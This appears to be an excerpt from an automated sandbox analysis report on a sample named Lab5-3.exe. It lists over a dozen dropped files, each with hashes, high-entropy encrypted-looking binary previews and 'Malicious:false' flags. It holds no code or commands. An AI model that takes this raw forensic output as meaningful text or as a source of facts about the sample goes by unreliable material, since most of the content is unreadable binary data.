                                                                                                          SSDEEP:48:ePhg9UYeT/o9r8av3oDhSzpD2pV6CG1Xef8oU3HfUTid3hBaUoSGFcmeykEdEElk:ePhg9heTA9BvYl1H/qQ8oUcGx0uKeY2b
                                                                                                          MD5:652039808CC56CA126FAE1CEBA8A5148
                                                                                                          SHA1:D3ECD3319B759E10ADB1727933471C3CC0A70E06
                                                                                                          SHA-256:9B60F13B8ECAD86F53C63C11E5504200E74653F8EAE23174BDB6962D4A0EDF93
                                                                                                          SHA-512:529B45BD5743047051F017875AE9C7ED3C518B5FD1757D957717D6F1CA2A04B8560375199D520C36ECCDE647C681EE79D2668642DA0BED97A78B289735573EBB
                                                                                                          Malicious:false
                                                                                                          Preview:B..>h....6\8..*.V.AT..O.<....h%.RU.'yv....Q.3...|....ba..ONg...~].5.N.x.4.....GD.n./l.V.q.......,...Y...N.[.ul.).....K.J3)S...*..{.`i....$.U...e@../.p.^a.....n...b.?..<.z.........z....#.&>.....U...._GmuB....zC....v+.6...e...B.b..9.Z..<.{.|..............&#rX.c..M?."R .`Y.0g........<.|....z..[5.ir.o.G..{5.{.8..>.G.t..5....c.....[/U..E.B#.q2D.n.l.Q..H.D.h'..)H.?..H..e.<0S......pX..ld.R:..EL@..y..W..qLl.g'.p\.n3.......#a5i.....QS.x. .+F4[...Y.f..'.16...._...8.k.z]..K:+$.o..!C>pW..{..f#..}z.A...F;+..N..p.[V<@.a.k.#.8..:N....T..c1\....Y...G...Jg...@H....;E.....y.v.{.....4.t....k...6?.G.....S.....ZZ__....j#..3.?.p.%\..e...S...#....4....a`.....I.E...@.. .S..$.....O...#?bP..~...W...%!.X.:.>~QH..;6...t..8.^....\..8[...Y..%...q.,..K...<w....3..(7......oM...|Wu.....V......Z.. .=.....5....,.A.8/..Y|...Q."..... .^N.....`.c.....R...`.D.....6....&. ....F.C.'(...$A.g..v.Cj.G.Eiy.GE..8?)...y./..Y.q.#.`6..J.x.....D..p}..s..*...3.\.C..c.............T..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.94083614382106
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LaMr6U7iqfxcv21OmklV3+pvvaHfUTid3hBaUoSGFcmeykEdEElU92i:dF7iq5cv2UHly1Gx0uKeY2ElUJ
                                                                                                          MD5:56E0F7732029D9E35B81B39C19E072BB
                                                                                                          SHA1:589C75731E31E48A4CA3F05948695B7028EA3822
                                                                                                          SHA-256:5896A09E182E9FE1AD76F0E8E97B7FA9818D599398E5F1D8D41C8E9219005514
                                                                                                          SHA-512:08C691B8E878EE3519D24264E2F1227096AED18EB3C86ED916CF1C4AEB3736EF1ECA96A96F8AE4565C0B7C88D806056614540E10D7BC94E52C4991D90B0D485A
                                                                                                          Malicious:false
                                                                                                          Preview:J..&.L.....a..X..tV2(.\...........m....d.$H~.@.{..7!!N.&.c..l..5...."...uW.@........P.F.RU....gv..p.......,N.........S`1."Lxq.)A..........6...C3.A...=V"......|.-....G$...>...2wY ..../..{.B..=.x..t..1.&.o..#.T..mGX..H..5..Vv...L-.....!...2+_.YL.@g.uz&.K.z..t]...(.V_n./......EG.C.uQi.....s....c...)T.[x.e.ub.D............I."L.....O....I..h......{...5..W'...`....6.,>..JbG.M.....nRF#gv...$.m.<...f.C^*.T..R.{.I.Q).].~O.k...)....#....4..c..]2..}...Q..%..5.D....=z.P..B.tQ..Xd..;ux...\fL.....T}...~..^..y.{.[......ON...ayY.^..=H.8.....b.....:8...Vwdw.lN(......_D,_....s.0.,?.t..g#?..=.x...v.47..IPa}.d...(..._...:{..l|......Gm..! T\oM(Pk...t..=...c;..=....b?....ZR.&.R.:.%1.t......$j=.......t......b.......a.`?X.b.uw...:...31..v.|.4...-JR....Ne!.H...Q...Q.X#m..z..F....&...G...n.....6 .<...!..........O.h....~.3^_..".0.g@.I...R.....T.(......3.\i..p+.z......n.MX.O.... K.#.uQ.J...]..Uc..G.)Fx..tcoZ.c......,,........B.V..7..fd..4...P.K4.?.%.&.l..`....^...z..]{0.Q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:PGP Secret Sub-key -
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.936907132462196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tkBIqynY/a1Cg62mQ2J414zNrAcOnC1LhBCZHfUTid3hBaUoSGFcmeykEdEElU93:jqyC+ZmNJ41mtlrCaGx0uKeY2ElUJ
                                                                                                          MD5:1B009591688A192706361C8163390DF2
                                                                                                          SHA1:7F200290BB9BEB2B4E5024B3D870F93A9528A3B4
                                                                                                          SHA-256:A8EE376D8A0C53355696B0700225B4B21656CFA9C3E8C6D190B04FC569955D97
                                                                                                          SHA-512:D605EFB6F433DB6C72FD1E8F35FE618CA1C3BEA852B244CCA72889C34568DA48DC738341492097C00B3E434732E1C2A1F1E27E337A38D61DCD33DA286BD26F4F
                                                                                                          Malicious:false
                                                                                                          Preview:.Q.:d.%WA.....K...B,......DiT...p{.9...o...!.~..0.....u..p.ns...*._..+=...e...Zx...]...7.r$.u..8......d.s..Ds......H..Bo.a'7..3...Q..[.....LfKx4.....zU.....F.x.Y.W>a.)p.<yz.."M.)...7.#.T%..Y.zbK..s./t..a.J.LfN5?.y.l.....$..q...p.b.y.u>%.=..r..o........7...O..B.,..K...{l..^:1..W..nBN....H...6........GDT.@..A8<..!.T.5.}+.*.RH.xp.Kw.....o..+...C...TV..#w).E....Me.I.z.k.._" .Fu;..h....R.C.gc.........Q..@a.d.._.... e#u..n.(.d.....9MB$.~.X....N..~..t=...p.q....5[..2C>..yr..3G..."..`W.G9UGF...XS..........X...(...n....8...U..>..@b..U..Bx..A.....''.yZ...F4X....Q...NN<R&}S`.\..4.$..o.....\...q%...5+.q{p...R.r2.7O)wq..f...U.I..a+...*U..e...#....!...X....Y.|....-.b..h..F...u..*..R.\-.S).)..i....S.$..4\.S.s..z0...(..E[j.2Q(yH.~^.......#....5.................$.&..Cg...!.4%.. ...S.dS.$..O:...zq..t...w.5_./.6:.N..IV....c".5-\.....Pks.D.2.aj..p..Km.t.6..c.V..v....R,a.X.......g...-?f.Ol>..(.7....\M.7=D..%.#...1....E.......-"7S.....v.p........Q.I..C.-c........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.929380802967593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ySZvX28iJdTWhZEplwCNRC32s1oj/HfUTid3hBaUoSGFcmeykEdEElU92i:XvmDNayUORC3LzGx0uKeY2ElUJ
                                                                                                          MD5:CFD5A3DF566A5A68ED2FD487ACC62B6F
                                                                                                          SHA1:EF1D3D6ACBF50BE3006CFE12A10CA96756320B63
                                                                                                          SHA-256:24744C82D65D04FF32A96CD4076FA0ACF293A9C23B81A4A701787C87379B2C07
                                                                                                          SHA-512:F22A2A0E70275A7C5C83A648C94FEAB301B91714A5EBB79A44B9BA26BCF26A2F7412D6EF03836B62F8EADB8DE4BF19CDA0C3068AC2D62C95357C7C7A403C19D7
                                                                                                          Malicious:false
                                                                                                          Preview:...>...wE9...?.&...,......2...[.....Az..:+=H3....]..T.T...Ui.oD..`g.:.CL.vf.wU.H.]..`...l.H.d..X.......I|%L.....w..eR.1%....y....s.M..(s.9,7...q....d=...T.s.W...c_..[:.y.o..e..P..qM.o.=P4.n^.m....Z.i..a....Q....7)."u...sA}.s.........2.!....2.n.D......!...mCd..EC...A....O.i.....+...IL;.....k"........{..;..<..!c._.HG...."nI~........z.(..^u%y....G..+...'Y;2..n:.J{U...0H.-....5I..]............)...........G%.,P.Q1.G.v).I.......%B.3>/..hZA.LE.l..v....15...... g..(....M..{.^\;......B....R...U>.....O`..(...f.....~.?..X.-..XTf.."...L.d.........&u...|.(15........{\{.y..S...L.#+...#......\..i-.....s.....P...k.d...w..F.bu]t...RR:.....[.Z..H.p...P.._WX,i.......n........Q.._..8...3...Q%A(...h.o...`^..}.|5Nb@....3&.n.QB0M.@".>..6P,MB_...H.&t~..b.3~..e..........h.u.5<.=...s|...+.%.0.N.......q...@wm}....." .'.\.C.I.*.........e.].9.Z..T}f..=.op.IX..4.k..A.iM[E.*.G...F<tV.!..2... ..z..;rP...X.....y.O.r...d..b.^.N6..].e(`8gd...._M>....+f.T.Iwq_..G!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.932089949988836
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:eKsyr25LxSblYCUCiUT7Ddk9PoaHfUTid3hBaUoSGFcmeykEdEElU92i:3sk2lxSbl37D8Po1Gx0uKeY2ElUJ
                                                                                                          MD5:37D2C1566B41AF281B0A1272D0228B27
                                                                                                          SHA1:3953728E1A8C90C6AC69333B8FBEDF2747A5235B
                                                                                                          SHA-256:35BD3F11008310CF79E54023163EC5AF1BA6CFA33C089718B18FDE1E7C8E4F57
                                                                                                          SHA-512:86C69561DB8900DEA9621E54717532CC79A63EBD8843B6B3863A0B3D263754D19D7FFD25BDF935E61B5CDE155640D3CBFB787D7CD5724EAB6B5DE9536E596C60
                                                                                                          Malicious:false
                                                                                                          Preview:6......l...0<.x..y/.\.....E.....#..m0.4.W........M.....N.ye.t.. ..$Ra^..r..r.. u....d.6`..b_.8 ....i..~MV{...Yt......:#...7.....{.X.!.].C5.........bHJ:..ook..!.H.....G.P...{8.hfM..m^k.........#..-2.RP8;]c...|..l...u.2.H7..R!w\7...<.kv'.N..I...X........EJ.~..../Iq&b...X#Hz.......=:h.k8...H.o..0c.E2.=g..............c..T....,z..7.z.j..y.."....8!)\D..x.C.R.G....@S.0.1..7EL..q..|...^_..=uw=.....5gg..(.......b.s..(^..:z.R........=...*.E/...p..Q.../V%*DK..i.....k.3p..2...U../....NEz ....v..g.. d<.J))`.........u...E..C.?.]R...g.X..<.P.".].DT.....~.8.K...%6`Qx.q.....x.\owk.E.W.".3N...1.%.I..1.'9..k.mr]...H[@~.L<g\.9.\.Q...F0.y.....Htn.G|:.v(.H....:.c.E...4.9Y....]u.k...S=."./.d......c...o..-{.CB.e.k%....R....]....rb.$.V.O}&\..}x.Y.R.. ...v.[.E.0..+'.b.6][y.R4.fs..H?..q5.B..\-.._.....]....fN....|....y.\x..&....>..D.a3HE.THNb.C...c.<.F.eg....[.L....'VQ..mi.7.~*....x@lu.&.a.F.....s..pQ.....|9Y!.....Y..yp.R.n-.~.N..2....H...h.\.... . ].c....O....f..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.933743427609754
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IAVstAN/DnM1L2ZOgLkoHq+JeRX+mIkrhCY9wHfUTid3hBaUoSGFcmeykEdEElUJ:Z2OLM1SRLkoK+kRumIxYJGx0uKeY2Elk
                                                                                                          MD5:C5ACBFDCA682441271C6A2A2ACB5263A
                                                                                                          SHA1:2454ABF71C00C08465206E3618BFDAFE83C938BA
                                                                                                          SHA-256:78B5172ADA74B6A1801D6169C329F0179102D9A74704CAF81706784D82751CC5
                                                                                                          SHA-512:5FC4FD417C31EFA28E4716FB79CB2925F9A2BDDC2CA73B953EC6D071C88F4174D0B989BC3CE841F093E2EE6B46E480C4920516A51324976DF0FC6B725FC9943B
                                                                                                          Malicious:false
                                                                                                          Preview:N....e..9=.1..../...o3.w....y.t...%D.m...*..N..........(ff.I...x..*. ?...s...4.`M.h...@....{].3. 5w..7.'...:..;.../]nAE`m.....Met...#.....Y.....p..IMsM.....u.......Q.....PE...D~@..z..i./2N-.6..Q.Nw.*...+?P....(...B...Z........:...[.@...w...Q.r..i....aN/.g....n.6...m..S.#....Y.....#.G..`.Q...}.........D...K...@...@.....Uo.*.....O1....B..7..........@...k...(...'o...dU#5Db.....h..b....*.......?....0g....:.2.4/q.L..\.,n1...z.1...6Pw.'..h.......l...;.@.ZMd..P(.o....Il..~.:X..g#...b.Y......2Pj.Q.PE..6.-..~..^......b.J|.Py..#....g....=...4..5L.!...0..q..i1..z.!h.[......F.+.C.|.....^...[v..p...S..iW...7.p.3B..:p@^g..Z.C/..{!...}.>..2..Z`.....V.b-....u@.&?R.........%..4......d.XTtz#.`l...%^.1,...._.U..uj}z.M.rl."...vZ.M.u[...d.>j....1W."......$.cU..Z..Z.i.+,c..U..t *8`..2.....`.....B..D.#U.YI....G5..!+.+;.Vt*..@..op&i...~.J%.t....bT'.'<4.6...h..Mr..Q....E.D..b..*.)....PQ3... ....B.'.$..%.)........<....+..{kK........}.o.v...V.c...)...o.z..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.93747362755779
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:djZG6BvONk8uEXGT6ZHfUTid3hBaUoSGFcmeykEdEElU92i:d9/mq9Gx0uKeY2ElUJ
                                                                                                          MD5:D04D13136F5881132C9EEC1417E9A5EB
                                                                                                          SHA1:7D6BAAC3E4F0846A6152E7CB237C8C4B35C0C0A4
                                                                                                          SHA-256:C13C47F573E2858D215C837E24ED7A4EBE5221DAF1461F7AB297990382F2220C
                                                                                                          SHA-512:91E53491E709EC3FEFA67B3BEA31F26A0F67E6273CA59C68D1B33950F2D6DB81F0A8B493F720916AE7B0DF8733C944D800D65B00C88973BA8AA7360EFF8A227D
                                                                                                          Malicious:false
                                                                                                          Preview:...^.;.j.......q...L.'|f.f..bx.E..bk..6...u..91..........V..u.C.4>\Qu-".Geq....M]@-d...-..q1.]....U.,...|Pv..w....(.*..#.2.D........^...hK...'^.pS7z............M.\8.V+......oS...d."...N[.'..n..aZ2.8.t.X.i.r.Z...BpR.....B/..M.djX.m...4ad..7(.....).r1.!PS...F....G>.4..QY.8..0.s.O...k..R...HZ..H...w.....S.N..A.z7.E...M..U..(9...k.....,.b.....+.........M2...C.M.C........#!Tl......]w..!`Y.q.....V...:."..\_.....N~.=.......>@...0..kr.<x..&.X]ai..@......w/.z....S*j]L...b%...\.eXT.N..PV.6...e*...D.M8.A-......7Z[H..o..*<.....y.%`..h.)9.d.k.Wz...^eJ..%......p..4..}..|J.....=.b).-..3...).~..m....."?........HN.......;..._5..a{..$#...@.esZ.~...nyKg.H...D;93.....]y'-> ..8..Q...q).4.y]./.2.Q...c.\.b!V.G....e}c.h...Q....C.6...] j. ..J.w....hO..........a.$.}tt......|.(.U.-\...W.E...D.M.....T.D.....*.&....G$..y...<yM.d...,......FF._..g.[J.....TQ..Mn..i;..a.p.Y....H.JD.9.xXuPdd..s...\..DK...F...af..Xc.c.d:.....K.b...F......VF....(...-.lT.-7.l.._../.x.....*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.933758462897211
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2q5XmVjbLrdcSyEctRBKT64GyrHfUTid3hBaUoSGFcmeykEdEElU92i:3QbOSNcZK+3VGx0uKeY2ElUJ
                                                                                                          MD5:558F69FF4C89EF4F110FF04C923F8120
                                                                                                          SHA1:65FB85D76D4AAD44651677FE4357F4B87ADCA5CB
                                                                                                          SHA-256:ADCF304924B14A4285CE4F456885CF814FC7D0D7C16E1731CB9AABB199E44F5B
                                                                                                          SHA-512:3D9D352142C4A26971486B04A23010A3F7334D9BFCD660DBB928AE18EB24000A154B03C40EBBEEE450D07DDF167BDA6C544EF6ED9E2F3336596469866C28C311
                                                                                                          Malicious:false
                                                                                                          Preview:..G($.I.F..|,Y%.kI..d.....$.E...p..vK..e..br..E.@...l,.5..*_o%..tx........y.+...&.0.......i.i..g..re.!S......E(O.-n.Xv.....e.S......@.y..c.A.ERo...8i.?...cH.0.Dv-..9R..(%fb..<..Z?(..}....P.#&.`..x...\*z...`..x.N.....5.b0.Sh<.;.)i..R...z....p.....N..dQ.=J....b.....h.#F..Mx..\....Z..Mm.F.sY./....c.L.e.@..... \.8..~...R.n3..Y&.>0.cA.z...2.L]...?o...;....K).....,W..Bj.{.We.H.y.QI..:O..{......&....r....C..8/......Y<..1..U.'.V..{=.+K0.o..1B.K....4.Q&.x.....D7....q....]..p.g...cp07<..}..*PAn39._..........61......c+..;,...2.......u.....hyF....=Y.?...........N...J....ED....k.>?........~...j.x.....^3.....6.].U..Y..Mz.g.9...@..p)..T3*.t..d.......g.O...m.p....y..=&..b....}...r...n.}.>7...D..n[....Z..H.8Y..9...^\\.....{.:.Ta...^.e.K.g.,l.E3....#......I..`..r...F.+...&..............I....R..W.*.X..................1rY.#D.).f.L....[*...R...w...N.[e.hY....O.y...s.......;..^3.......W(.c.g..[..a5s.w.@.v,".. F)K`..$......s.'..ep.cH...i...3&(.wz....r.{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.931351936951083
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UiDysDpKt1p5bd/x/x44nPs8/YqtCwh3MnJQBHfUTid3hBaUoSGFcmeykEdEElUJ:UiOst815x/x1suYqtCw8JQCGx0uKeY2b
                                                                                                          MD5:926AA2AF0328705342034A728CB20DF9
                                                                                                          SHA1:AAE6ACC33C71C9A2083CDCF71DF803CA7D1F097A
                                                                                                          SHA-256:D33BB9EAC6DBA599DED602B40FA5A2247B6573D0C0F39BB624CE1EEC617C16CD
                                                                                                          SHA-512:372CF7EB8722B7CAFAE25CA4EB5E246074F166089B89B45DD9958BACFBB8459B12FD8065E5060EA83F4134656642909C259CBD928571CA62398DEC52F193BC7F
                                                                                                          Malicious:false
                                                                                                          Preview:......~0..........n&..x.%g.....=.B03[.N.....u.....1...(.E.-&M8.{={^........X...U.sGN.+......PK..H).\~..5..J<i'..|i)..l\.;....6;..^6d\........&(.7.ff|.....;.!.k..\.j].(.e...jQs)}R>T.....<.Ih..0...l.mr..U_+...U.Q^Z.K.....p3u....R.+uDo.....r.V..Skl.I...m....4|._..'.....NsK2.f.fe|/..*]E..;...k.....D!..Q.7.?.Q..u..hB..).hj...2..D..fv....vh.s.D.y.b......(FS...P..h...3 .:..|lX5R.M...p..F-..Z........ .4..v,..u......N5....9H.O>.Eg.....=&U......-*g.L..r6...X.H5Bj....@..ro+.8....1%0..715.[.X..R$|......i..]...M.D.u..:.[...z)....\.(S#.!~..;.R..pR.=......z.H......8.1.Y..\6...H.=37y...d.9..,..6-/*...}...a... .@../......1.....~2....Q...*.".gC..*"5 #....N.Zzw..f..2..}....j......5".y.3.G...k..........{.....2.P.T.]'.p+....2..n....G.X.#>.CI....[I4..2.O@....E..l).v.k..9n].no1.Z.6.O....*,.%6y..3.*.......;..Q0,.<....rl.4<S..e..^.vS0wc..>.Dcd.f....Tr..Q7?L......Q...v.r.]I<.8>I.....L.,[..fL.9`.......h...(.s..&......#w_\c..V...'l.|.Wb.C....=]{.._......q..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.932995641880694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Ok5LVEnglpVJEMdi/pZ8gyriSWHfUTid3hBaUoSGFcmeykEdEElU92i:OWDlpVJEMQZyrjGx0uKeY2ElUJ
                                                                                                          MD5:5264BB678B87446CE3AA50DFBB1DDEBE
                                                                                                          SHA1:44FEC51FA1437526D0A665890A18140719029FE5
                                                                                                          SHA-256:FFD06F83242936A37C283684556F844A5C60CC7FA98CB550879A20439C8DAE1F
                                                                                                          SHA-512:45A7DE79E499FCC8C7AFCAC82BC26B90AAA85D37072E808EF499372AC781729FF33E62981C7533BDE0C81E372C3E51B98A87A43CD40309F09D1BB857C057D46C
                                                                                                          Malicious:false
                                                                                                          Preview:.8H....t...,...f..=.l...1b.....t...i..]..2cgx.Nv..hj..;...~V..n./.*9.....<...i..Ih..R^.....B......T0..m.UT...@/....t....>.cs......Y...U"E.k.E......6...{......s.....I-kR#S*<.{..v..t..[. ./....r...s....x2......h.....%.<.X..2..L...B.L.n^..D..$.n.......gn.......[.j..\_q..Tv..>.Q.{.b^..........v1..x].......(......_~<.5.~...GaGN}{i..&_.c..@.....l..U|^....X..z.........oc..O8FF.*..#..|.Z.V.Y+{Cg..a..e..vt...*/"..]!V.?......^..x.+.c]jK..J3..|...d.>...#.>mo.:..4...7G...~..M.D....V.0....G.......U.~g.......cY+..1;{.:k..XL.G...L).m..E...g..b\.;7..hO]m...N....-...w.B;|.zb.5Z@....x..=.*U....^h.vH...bHR2.O.%K.O.n;.H!....j.PF....E.......6+.%.....L.. 4z..@D..TS.E......]..,b.[.\f...2.t.W.6HCj&.^..m..P...>.z.....nj......9.W.A-7ZU....)hrF......I......n.V.......3.m\...cr.).............zx.!....s..@|...a...b..l..eKp.@......`*!.../.l..S..+...rLm....[.k..P|.,.h..G.W....U...61m...b.<].J-<.2..'.....X_..~.'..t.RrE+..4/':...&.WP=P.i.. S.U`.l:.K.bc.?...vZ#..d2.3......].L.i
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.941443459422072
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KlfJ6L+xmmeaDp6d5dtZpApNy3ZmXioYWHfUTid3hBaUoSGFcmeykEdEElU92i:Klf9xHl67dPKpw3Zin+Gx0uKeY2ElUJ
                                                                                                          MD5:499DE349589A66956C04CE3C7B2B6688
                                                                                                          SHA1:6B1FAD289D1D9B9E38BF377463C07F3745057697
                                                                                                          SHA-256:3E89F4345DF295D76F05103143BFC8654FACBFFD5AA6909855EAB8C5E4F370FB
                                                                                                          SHA-512:79DDEF510BA6A76DA5A61FECE1FFC995B5FD9F387D7AF111D02151FB9233C2EF8579BEBD1881726C494D02AAC33CEF3292C4398C97006ACAD4EAD30F548EF519
                                                                                                          Malicious:false
                                                                                                          Preview:....]$...%.=|.m.Z'e.?....&~.3@...R..|Pi7.p..Q...WSD...%...>...*..IV..'...~...R.DH....e..Ba........BGn..!...i\t...8...G"..w..L.2.....*y....b...K.....j.M..>..>.oD0."../.y. .yD?.....E.$.p.....C....=|>..^.h. ...^...#.RT...zL.....}..."6.._.6p..Z.....%..&..yr\..+..N.#.H...bt.s0.....Ww.esGA..w+.<...../s:.......'.9.3!.X.L...$..p.x...m..A .&....-....b:.z..q....W....h1t..3.$.0.#..@.?.l...3.id..=;..a*z^...8m.i....=..;.f..D]p..Y._.o ..j......"Bq....>p..s+....\..%.i..#.<.;.R..t?.Oc9.P.H.A.t4..'..%..&.$....n.........#.g"..2k4VY$zi.I.Z..@...T.O.$..>V.k....u.ks..B,.....F..%#...>........"....{.5..........X..y..!..0 0..tuo....+..;...wr.R(j.}...........^.e..........9.Y..8..m.........LP.*..oK_J40q^xd.o.d..9.b..7.'U.N.R......>{...a....1..kf.o.?[......Z}.k.Z..../,MPb..O..S..x.6.:5..".....h.....c......q......9sV....r....G..w...T).+.l..5e.w...f\.6o..i)..n.sF...I.+|.'..n..b-.M-.......EC'....E.|Y.....JO....l..!z.07....../g(..}d.'.H..3.y...!..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.931604627357341
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0IwMXXSE2hNkUrxErZbtt8Z0keleG4SxpzHfUTid3hBaUoSGFcmeykEdEElU92i:pfHINkUNErp0cBpAGx0uKeY2ElUJ
                                                                                                          MD5:B6AAF7BF751005D1CB09DFDE230AA22E
                                                                                                          SHA1:D0A4497837EB6F0AC4FB99F88CE1E7C606D07C81
                                                                                                          SHA-256:59A5270E2BA8F2ADDA193B14EB7438FF7052C1B7D99CA53812B62AA4033BAD03
                                                                                                          SHA-512:20C16ED9D425DD738B5979C3F856E44AD30D89A3C7470C7B4FF5241D414BF4B59FAD923B2D364DCE1D2CB7B59E5B06FECCCCA50F11C1643022E63E5BB356E9CA
                                                                                                          Malicious:false
                                                                                                          Preview:.y(..2.'...V.o#p.9l!'......A5.8l.k.........n..1;.!.'...._.>...kk@.......?S.WU....V...&l.....E.........6...q.f.......m........h.....w.A.\C.r.2_..`9...... .;Ruas{..`8....<....... Z.A..s.M.Doby.....>..w.t........9EiQs@b.EU.Kl.K..^....FF.=.U....p.......r....<..De(#....u.2..J.Np.-.6...@.....*......a..z.........Bg{......T3Y..B.'X..g@ND...".J.8.x$'....K.......1m.UC..VEo0.Z..]<..x.v...|..).C2..}.s3g.1....DD...J>..H...~.f.F.}..rP2._.g.MP2Z.Dy..X....8........r....u"...O..;..x...LnKb...$..V..fRyF..'....d.B.....3..l.......IfK.a...C`.].Y....fSU(..[.Z...r.4P.<K............ .S.?.y.8H..T.T.vw.".0.B...#?h~..q....p..T.wh|....a.~O....?_C..Qm..=.;y...+\.n!~k.Y...9..oAB-)7W.T~r...9Aq.S...p.C......y..e....\M4-..h..".\bQ.s1....u....jW.qV..?S..-.r.>....~5.......<07K./...6CB.....K.,...U,.Lu..+x..h.,........7..f>,..Sr:..|..O...X..>..I.n-G.... ..../.g...."..]...........L6k......4.+.t[v.8..2.jv.....>.....$e~(.bs#x. bB..y.;.'%5)...C&Aa.!.|n..!. .F.fc..Bk.m..m....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.927428569997959
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6FDzX9FvnknUEtvGL9vGWCeO3bHotgv0HfUTid3hBaUoSGFcmeykEdEElU92i:6Nnk7989vE73KSzGx0uKeY2ElUJ
                                                                                                          MD5:44DCDD72F522210AE47A78CEC740E6BD
                                                                                                          SHA1:402F6471687C9664367712FBA73B1E0B3BEC2A4F
                                                                                                          SHA-256:6A389D2B7A8D42C188E929BDEDE9F6E6ECB5A6F362237EC12BC0853B51F2C67B
                                                                                                          SHA-512:F4EC6BA105F645EFAFD1C96225B0AD9980839002531191D36503F34EDDB7E00CAFB0C4DCD07F66DFA3D218A3211C54CA5F335668160D783D16F4F1C795503D05
                                                                                                          Malicious:false
                                                                                                          Preview:....b.q.F....m....T....WQH......vT..|pQ.Exc...Z...4. .e@./(.DHe..=I..|...........D`.....D.|....s7SzvE.`i.Q.u..Q..W.?\.....q.1.^9.L.sHZ..).~\r....4+.G0.6....p. {.f..g..F......*.x. .....T..H.Z..v...p..S.'.`'t2x.#\.....1.Pg>....X.......[.=lAl..mEX.t8R.(S............w....%.jL...v....I.....U{?O!..L9....n.:r.......-.{"....N.(bw..-....uv........8.....x6z...h... ...U..1...[.......2.....f..._rq..+.W..?.....3....v..!LJ.p...e..........x?..u+D...v2`.!%y.`.v.X$.Z...'..2...M/Y.E.R.w'......(.....<B...pZ.U..U;.A.rW.......L.....L.B;..fTmq.....%,..f........TB..._.hh...C..D....<d......7..V....".....Z......M.>....W..'...?p..h.z=......Aq....*.H.......m".......!.....`....l.=.n.h.....t..zo.dh..aZ_.. ...)..gj}I..\.;d.R.'U.~.\....K.M...SN....GG<X.U.. q<8*.C.!.pc.......7.V58.O.....=..&xK... Nv.....f..1.eS..(.k.o...['..B.Q.O...ew..V.....i>.2M..rN.~.E..>.#....`.#...q........W...s.g<.T..EJ.\(..e..*.k..q.N.....(3.U..r.Fzv.n.~.8L!....gt..*.Z....Y.3O..../o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.923937501190901
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9TCxu4uKXAPxnS7INHfUTid3hBaUoSGFcmeykEdEElU92i:cflMdeImGx0uKeY2ElUJ
                                                                                                          MD5:ADA2317660F4FD07182159C25372E116
                                                                                                          SHA1:61D47B708555FB5A8611264DE599EE542BD5BFC4
                                                                                                          SHA-256:78C2A532A805753A60656D68ECB90955386ED51D795E530A942CEB0EFB622A79
                                                                                                          SHA-512:54BC03956AD1C6CE3FAFF2F1BC2F19AF21CF4B04D334C0071802AA70E4CA5B14A7E399FA57B2B761C687F39C03274FDFAF47C3D7398389B6DDB13B876400B4A4
                                                                                                          Malicious:false
